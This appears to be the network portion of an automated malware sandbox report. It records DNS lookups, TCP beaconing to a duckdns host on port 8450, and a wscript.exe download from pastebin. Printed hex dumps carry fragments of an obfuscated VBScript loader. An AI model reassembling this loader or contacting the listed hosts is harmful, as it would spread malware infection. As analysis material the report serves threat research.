May 4, 2024 09:51:54.459628105 CEST	8450	49751	12.221.146.138	192.168.2.3
May 4, 2024 09:51:54.568541050 CEST	49752	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:54.917629004 CEST	8450	49752	12.221.146.138	192.168.2.3
May 4, 2024 09:51:55.428117990 CEST	49752	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:55.778351068 CEST	8450	49752	12.221.146.138	192.168.2.3
May 4, 2024 09:51:56.290410995 CEST	49752	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:56.635962963 CEST	8450	49752	12.221.146.138	192.168.2.3
May 4, 2024 09:51:57.145956993 CEST	49752	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:57.491520882 CEST	8450	49752	12.221.146.138	192.168.2.3
May 4, 2024 09:51:58.005333900 CEST	49752	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:58.350703001 CEST	8450	49752	12.221.146.138	192.168.2.3
May 4, 2024 09:51:58.694225073 CEST	49753	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:59.041054010 CEST	8450	49753	12.221.146.138	192.168.2.3
May 4, 2024 09:51:59.551848888 CEST	49753	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:51:59.898291111 CEST	8450	49753	12.221.146.138	192.168.2.3
May 4, 2024 09:52:00.411377907 CEST	49753	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:52:00.757868052 CEST	8450	49753	12.221.146.138	192.168.2.3
May 4, 2024 09:52:01.270462036 CEST	49753	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:52:01.617290020 CEST	8450	49753	12.221.146.138	192.168.2.3
May 4, 2024 09:52:02.132201910 CEST	49753	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:52:02.480150938 CEST	8450	49753	12.221.146.138	192.168.2.3
May 4, 2024 09:52:02.596415997 CEST	49754	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:52:02.943425894 CEST	8450	49754	12.221.146.138	192.168.2.3
May 4, 2024 09:52:03.458384991 CEST	49754	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:52:03.804440022 CEST	8450	49754	12.221.146.138	192.168.2.3
May 4, 2024 09:52:04.317082882 CEST	49754	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:52:04.666666985 CEST	8450	49754	12.221.146.138	192.168.2.3
May 4, 2024 09:52:05.176459074 CEST	49754	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:52:05.523108006 CEST	8450	49754	12.221.146.138	192.168.2.3
May 4, 2024 09:52:06.035698891 CEST	49754	8450	192.168.2.3	12.221.146.138
May 4, 2024 09:52:06.382431030 CEST	8450	49754	12.221.146.138	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 09:49:54.711997986 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:49:55.449196100 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:49:56.197170973 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:49:57.005835056 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:49:57.759603977 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:49:58.525310993 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:49:59.279782057 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:00.040805101 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:00.790829897 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:01.541980982 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:02.306451082 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:03.056454897 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:04.122045040 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:04.868937016 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:05.634542942 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:06.400897980 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:07.150228024 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:07.900455952 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:08.724129915 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:09.478452921 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:10.228389978 CEST	137	137	192.168.2.3	192.168.2.255
May 4, 2024 09:50:14.183017015 CEST	55147	53	192.168.2.3	1.1.1.1
May 4, 2024 09:50:14.344544888 CEST	53	55147	1.1.1.1	192.168.2.3
May 4, 2024 09:50:20.769767046 CEST	53	52780	1.1.1.1	192.168.2.3
May 4, 2024 09:50:20.771351099 CEST	53	50800	1.1.1.1	192.168.2.3
May 4, 2024 09:50:20.864053965 CEST	63435	53	192.168.2.3	1.1.1.1
May 4, 2024 09:50:20.866334915 CEST	53505	53	192.168.2.3	1.1.1.1
May 4, 2024 09:50:21.024216890 CEST	53	63435	1.1.1.1	192.168.2.3
May 4, 2024 09:50:21.026501894 CEST	53	53505	1.1.1.1	192.168.2.3
May 4, 2024 09:50:23.726409912 CEST	53	62584	1.1.1.1	192.168.2.3
May 4, 2024 09:50:24.132868052 CEST	53	59336	1.1.1.1	192.168.2.3
May 4, 2024 09:50:25.405950069 CEST	54418	53	192.168.2.3	1.1.1.1
May 4, 2024 09:50:25.406251907 CEST	50547	53	192.168.2.3	1.1.1.1
May 4, 2024 09:50:25.565973043 CEST	53	54418	1.1.1.1	192.168.2.3
May 4, 2024 09:50:25.566091061 CEST	53	50547	1.1.1.1	192.168.2.3
May 4, 2024 09:50:35.624506950 CEST	60052	53	192.168.2.3	1.1.1.1
May 4, 2024 09:50:36.111388922 CEST	53	60052	1.1.1.1	192.168.2.3
May 4, 2024 09:50:43.730951071 CEST	53	63717	1.1.1.1	192.168.2.3
May 4, 2024 09:50:51.616529942 CEST	55879	53	192.168.2.3	1.1.1.1
May 4, 2024 09:50:52.178682089 CEST	53	55879	1.1.1.1	192.168.2.3
May 4, 2024 09:50:55.558803082 CEST	138	138	192.168.2.3	192.168.2.255
May 4, 2024 09:50:56.672051907 CEST	55734	53	192.168.2.3	1.1.1.1
May 4, 2024 09:50:56.909918070 CEST	53	55734	1.1.1.1	192.168.2.3
May 4, 2024 09:51:08.747473955 CEST	53	54565	1.1.1.1	192.168.2.3
May 4, 2024 09:51:21.525321007 CEST	53	55138	1.1.1.1	192.168.2.3
May 4, 2024 09:51:29.635632038 CEST	59941	53	192.168.2.3	1.1.1.1
May 4, 2024 09:51:29.868714094 CEST	53	59941	1.1.1.1	192.168.2.3
May 4, 2024 09:51:37.381453037 CEST	53	56526	1.1.1.1	192.168.2.3
May 4, 2024 09:51:56.162007093 CEST	52825	53	192.168.2.3	1.1.1.1
May 4, 2024 09:51:56.397782087 CEST	53	52825	1.1.1.1	192.168.2.3
May 4, 2024 09:51:58.459589005 CEST	64199	53	192.168.2.3	1.1.1.1
May 4, 2024 09:51:58.693217993 CEST	53	64199	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 4, 2024 09:50:14.183017015 CEST	192.168.2.3	1.1.1.1	0x4013	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:20.864053965 CEST	192.168.2.3	1.1.1.1	0xf436	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:20.866334915 CEST	192.168.2.3	1.1.1.1	0xecad	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 4, 2024 09:50:25.405950069 CEST	192.168.2.3	1.1.1.1	0xd76e	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:25.406251907 CEST	192.168.2.3	1.1.1.1	0x4708	Standard query (0)	apis.google.com	65	IN (0x0001)	false
May 4, 2024 09:50:35.624506950 CEST	192.168.2.3	1.1.1.1	0x79d0	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:51.616529942 CEST	192.168.2.3	1.1.1.1	0xce49	Standard query (0)	www.evolve27.com	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:56.672051907 CEST	192.168.2.3	1.1.1.1	0xaa2d	Standard query (0)	xwormay8450.duckdns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 09:51:29.635632038 CEST	192.168.2.3	1.1.1.1	0x3998	Standard query (0)	xwormay8450.duckdns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 09:51:56.162007093 CEST	192.168.2.3	1.1.1.1	0x4c64	Standard query (0)	xwormay8450.duckdns.org	A (IP address)	IN (0x0001)	false
May 4, 2024 09:51:58.459589005 CEST	192.168.2.3	1.1.1.1	0xe756	Standard query (0)	xwormay8450.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 4, 2024 09:50:14.344544888 CEST	1.1.1.1	192.168.2.3	0x4013	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:14.344544888 CEST	1.1.1.1	192.168.2.3	0x4013	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:14.344544888 CEST	1.1.1.1	192.168.2.3	0x4013	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:21.024216890 CEST	1.1.1.1	192.168.2.3	0xf436	No error (0)	www.google.com		142.250.68.68	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:21.026501894 CEST	1.1.1.1	192.168.2.3	0xecad	No error (0)	www.google.com			65	IN (0x0001)	false
May 4, 2024 09:50:25.565973043 CEST	1.1.1.1	192.168.2.3	0xd76e	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 09:50:25.565973043 CEST	1.1.1.1	192.168.2.3	0xd76e	No error (0)	plus.l.google.com		142.250.68.46	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:25.566091061 CEST	1.1.1.1	192.168.2.3	0x4708	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 09:50:36.111388922 CEST	1.1.1.1	192.168.2.3	0x79d0	No error (0)	uploaddeimagens.com.br		104.21.45.138	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:36.111388922 CEST	1.1.1.1	192.168.2.3	0x79d0	No error (0)	uploaddeimagens.com.br		172.67.215.45	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:52.178682089 CEST	1.1.1.1	192.168.2.3	0xce49	No error (0)	www.evolve27.com	evolve27.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 09:50:52.178682089 CEST	1.1.1.1	192.168.2.3	0xce49	No error (0)	evolve27.com		131.153.147.50	A (IP address)	IN (0x0001)	false
May 4, 2024 09:50:56.909918070 CEST	1.1.1.1	192.168.2.3	0xaa2d	No error (0)	xwormay8450.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false
May 4, 2024 09:51:29.868714094 CEST	1.1.1.1	192.168.2.3	0x3998	No error (0)	xwormay8450.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false
May 4, 2024 09:51:56.397782087 CEST	1.1.1.1	192.168.2.3	0x4c64	No error (0)	xwormay8450.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false
May 4, 2024 09:51:58.693217993 CEST	1.1.1.1	192.168.2.3	0xe756	No error (0)	xwormay8450.duckdns.org		12.221.146.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

slscr.update.microsoft.com

www.google.com

apis.google.com

uploaddeimagens.com.br

www.evolve27.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.3	49712	104.20.3.235	443	7828	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:14 UTC	328	OUT	GET /raw/eCmZ7z04 HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: pastebin.com Connection: Keep-Alive
2024-05-04 07:50:15 UTC	388	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:50:15 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sat, 04 May 2024 07:50:15 GMT Server: cloudflare CF-RAY: 87e6e6177d753149-LAX
2024-05-04 07:50:15 UTC	981	IN	Data Raw: 33 33 38 35 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 69 6e 74 69 63 61 6e 74 65 20 2c 20 70 6f 74 65 72 61 6e 74 65 72 61 20 2c 20 61 6d 62 61 72 76 61 69 73 20 2c 20 74 69 72 69 76 61 20 2c 20 61 67 69 74 61 74 6f 20 2c 20 43 61 6d 61 20 2c 20 61 67 69 74 61 74 6f 31 0d 0a 20 20 20 20 20 70 6f 74 65 72 61 6e 74 65 72 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 61 6d 62 61 72 76 61 69 73 20 20 3d 20 22 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 Data Ascii: 3385 dim inticante , poterantera , ambarvais , tiriva , agitato , Cama , agitato1 poterantera = " " ambarvais = "" & tiriva & poterantera & tiriva & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8D
2024-05-04 07:50:15 UTC	1369	IN	Data Raw: 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 44 67 54 72 65 42 45 44 67 54 72 65 47 45 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 45 44 67 54 72 65 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 61 44 67 54 72 65 42 31 44 67 54 72 65 47 59 44 67 Data Ascii: & tiriva & poterantera & tiriva & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & tiriva & poterantera & tiriva & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDg
2024-05-04 07:50:15 UTC	1369	IN	Data Raw: 75 44 67 54 72 65 47 73 44 67 54 72 65 4b 51 44 67 54 72 65 67 44 67 54 72 65 48 30 44 67 54 72 65 49 44 67 54 72 65 42 6a 44 67 54 72 65 47 45 44 67 54 72 65 64 44 67 54 72 65 42 6a 44 67 54 72 65 47 67 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 59 77 42 76 44 67 54 72 65 47 34 44 67 54 72 65 64 44 67 54 72 65 42 70 44 67 54 72 65 47 34 44 67 54 72 65 64 51 42 6c 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 66 51 44 67 54 72 65 67 44 67 54 72 65 48 30 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 42 30 44 67 54 72 65 48 55 44 67 54 72 65 63 67 42 75 44 67 54 72 65 43 Data Ascii: uDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTre" & tiriva & poterantera & tiriva & "QB0DgTreHUDgTrecgBuDgTreC
2024-05-04 07:50:15 UTC	1369	IN	Data Raw: 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 67 54 72 65 63 67 44 67 54 72 65 76 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 42 7a 44 67 54 72 65 43 38 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 44 51 44 67 54 72 65 4c 77 44 67 54 72 65 33 44 67 54 72 65 44 63 44 67 54 72 65 4d 77 44 67 54 72 65 76 44 67 54 72 65 44 63 44 67 54 72 65 4f 51 44 67 54 72 65 33 44 67 54 72 65 43 38 Data Ascii: " & tiriva & poterantera & tiriva & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTre" & tiriva & poterantera & tiriva & "QBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8
2024-05-04 07:50:15 UTC	1369	IN	Data Raw: 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 4c 67 42 46 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 76 44 67 54 72 65 47 51 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 63 44 67 54 72 65 58 51 44 67 54 72 65 36 44 67 54 72 65 44 6f 44 67 54 72 65 56 51 42 55 44 67 54 72 65 45 59 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 45 63 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 42 30 44 67 54 72 65 46 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e Data Ascii: rantera & tiriva & "QB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTre" & tiriva & poterantera & tiriva & "QB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBn
2024-05-04 07:50:15 UTC	1369	IN	Data Raw: 54 72 65 46 51 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 4c 67 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 54 77 42 6d 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 Data Ascii: TreFQDgTre" & tiriva & poterantera & tiriva & "QB4DgTreHQDgTreLgBJDgTreG4DgTre" & tiriva & poterantera & tiriva & "DgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTre" & tiriva & poterantera & tiriva & "DgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTre
2024-05-04 07:50:15 UTC	1369	IN	Data Raw: 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 42 34 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 Data Ascii: "DgTreBJDgTreG4DgTre" & tiriva & poterantera & tiriva & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & tiriva & poterantera & tiriva & "QB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTr
2024-05-04 07:50:15 UTC	1369	IN	Data Raw: 61 20 26 20 22 51 42 6b 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 46 4d 44 67 54 72 65 65 51 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 42 74 44 67 54 72 65 43 34 44 67 54 72 65 55 67 42 6c 44 67 54 72 65 47 59 44 67 54 72 65 62 44 67 54 72 65 42 6c 44 67 54 72 65 47 4d 44 67 54 72 65 64 44 67 54 72 65 42 70 44 67 54 72 65 47 38 44 67 54 72 65 62 67 44 67 54 72 65 75 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 Data Ascii: a & "QBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTre" & tiriva & poterantera & tiriva & "QBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQB
2024-05-04 07:50:15 UTC	1369	IN	Data Raw: 44 67 54 72 65 42 76 44 67 54 72 65 48 59 44 67 54 72 65 22 20 26 20 74 69 72 69 76 61 20 26 20 70 6f 74 65 72 61 6e 74 65 72 61 20 26 20 74 69 72 69 76 61 20 26 20 22 51 44 67 54 72 65 75 44 67 54 72 65 48 63 44 67 54 72 65 64 77 42 33 44 67 54 72 65 43 38 44 67 54 72 65 4c 77 44 67 54 72 65 36 44 67 54 72 65 48 4d 44 67 54 72 65 63 44 67 54 72 65 42 30 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 63 44 67 54 72 65 4d 51 44 67 54 72 65 6e 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 63 44 67 54 72 65 51 77 44 67 54 72 65 36 44 67 54 72 65 46 77 44 67 54 72 65 55 44 67 54 Data Ascii: DgTreBvDgTreHYDgTre" & tiriva & poterantera & tiriva & "QDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgT
2024-05-04 07:50:15 UTC	1264	IN	Data Raw: 20 3d 20 69 6e 74 69 63 61 6e 74 65 20 26 20 22 e2 98 9f c3 b0 2a 28 e2 98 a0 36 34 e2 87 9d e2 96 91 7d 40 2a 74 72 69 6e 67 28 20 24 28 40 28 e2 97 80 28 22 0d 0a 20 20 20 20 20 69 6e 74 69 63 61 6e 74 65 20 3d 20 69 6e 74 69 63 61 6e 74 65 20 26 20 22 40 c3 b8 e2 98 9e 40 e2 88 9e 64 22 0d 0a 20 20 20 20 20 69 6e 74 69 63 61 6e 74 65 20 3d 20 69 6e 74 69 63 61 6e 74 65 20 26 20 22 69 67 40 c3 b8 e2 98 9e 40 e2 88 9e 2e 72 e2 98 9f c3 b0 2a 28 e2 98 a0 22 0d 0a 20 20 20 20 20 69 6e 74 69 63 61 6e 74 65 20 3d 20 69 6e 74 69 63 61 6e 74 65 20 26 20 22 40 25 2a 3a 26 6c 61 22 0d 0a 20 20 20 20 20 69 6e 74 69 63 61 6e 74 65 20 3d 20 69 6e 74 69 63 61 6e 74 65 20 26 20 22 28 40 28 e2 97 80 28 e2 98 9f c3 b0 2a 28 e2 98 a0 28 27 22 0d 0a 20 20 20 20 20 69 6e Data Ascii: = inticante & "(64}@tring( $(@((" inticante = inticante & "@@d" inticante = inticante & "ig@@.r(" inticante = inticante & "@%:&la" inticante = inticante & "(@((*(('" in

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.3	49710	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:50:14 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=ATnOdpEYx+LGGt1&MD=BL1LyFpe HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-04 07:50:15 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: b13cdfce-206f-4b79-9619-04b95321f0cf MS-RequestId: 43762e5c-3bf2-4138-aadd-229a46c939f9 MS-CV: /YqcjYXBHECAonME.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 04 May 2024 07:50:14 GMT Connection: close Content-Length: 24490
